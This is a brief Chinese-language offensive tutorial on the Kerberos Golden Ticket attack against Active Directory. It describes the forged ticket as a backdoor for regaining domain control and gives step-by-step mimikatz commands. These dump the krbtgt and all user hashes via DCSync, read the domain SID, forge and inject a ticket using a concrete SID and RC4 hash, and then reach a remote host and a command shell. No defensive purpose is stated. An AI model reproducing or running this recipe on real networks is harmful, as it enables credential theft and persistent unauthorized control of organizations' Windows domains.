黄金票据(Golden Ticket)是有效的 TGT(TicketGranting Ticket)票据,是由 kerberos账户(krbtgt)加密的。然而krbtgt仅在域控上才用,意味着你已经拿到了域控,用于域控权限掉后,想再重新获取。因为域控的密码可能更改, 通常 kbrtgt 账户不会有人去过问,另一角度可理解黄金票据为一个后门。
前提条件:域名称、域SID、域krbtgt的hash(意味着你已经有域控权限)、伪造的用户名(任意用户或者不存在的用户)
利用过程:
lsadump::dcsync /domain:yangdc.com /user:krbtgt 导出hash
lsadump::dcsync /domain:yangdc.com /all /csv 查域内用户所有hash
whoami /all 获取域sid
kerber::golden /domain:yangdc.com /sid:S-1-5-21-3607266505-2347408569-3184741851 /rc4:61406f430331547ae23cf5aaf215d6a5 /user:yangtest /ptt
klist可查看到票据,dir远程访问如下:
获取cmdshell